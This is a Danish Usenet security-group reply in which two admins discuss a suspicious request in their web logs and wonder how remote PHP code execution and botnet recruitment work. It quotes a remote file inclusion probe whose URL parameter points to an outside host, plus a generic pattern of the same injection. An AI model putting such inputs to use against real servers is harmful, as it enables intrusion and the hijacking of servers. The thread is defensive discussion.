Anders Wegge Jakobsen wrote:
> X-post til dk.edb.sikkerhed og dk.edb.internet.webdesign.serverside.php
> Follow-up til dk.edb.sikkerhed
Ditto, da det nok også er PHP relevant.
> "GET
> /wiki/MediaWiki_customizations%20
http://weddingparty.eclub.lv/images?
Tak for linket, den er røget i arkivet til engang der er tid til at kigge.
> Det virker ret oplagt at man er på spanden, hvis man først afvikler
> den, men jeg lurer lidt på hvad det er for et sikkerhedshul den
> forsøger at ramme. Jeg kan ikke i min vildeste fantasi forestille mig
> at der er nogen der frivilligt
Frivilligt - nej, det tror jeg heller ikke, og er lige så nysgerrig som dig.
> skriver kode der afvikler en tilfældig
> URL. Så hvad er det egentlig man skal være opmærksom på her.
Det kunne jeg pgså godt tænke mig at vide, og det er nok et spørgsmål til
PHP folket:
Hvordan er mekanikken bag afvikling af remote PHP kode a la
http://domain.tld??someparm=http://scriptlocation.tld/somedir/somemore?
>
> Og noget helt andet: Jeg mindes ikke at have set noget tilsvarende
> før, så er det bare mig der er uheldig for tiden,
Det er i hvertfald set før, diverse PhpBB attacks, men jeg kender ikke PHP
godt nok til at vide hvordan det de kom ind.
> eller er folk
> generelt ved at udvide deres botnet?
Det tror jeg roligt du kan stole på, der er *masser* af PHP enblet servere
out there.
Men hvorvidt de er vulnerable by default eller ej, skal jeg ikke kunne
udtale mig om.
--
Med venlig hilsen
Stig Johansen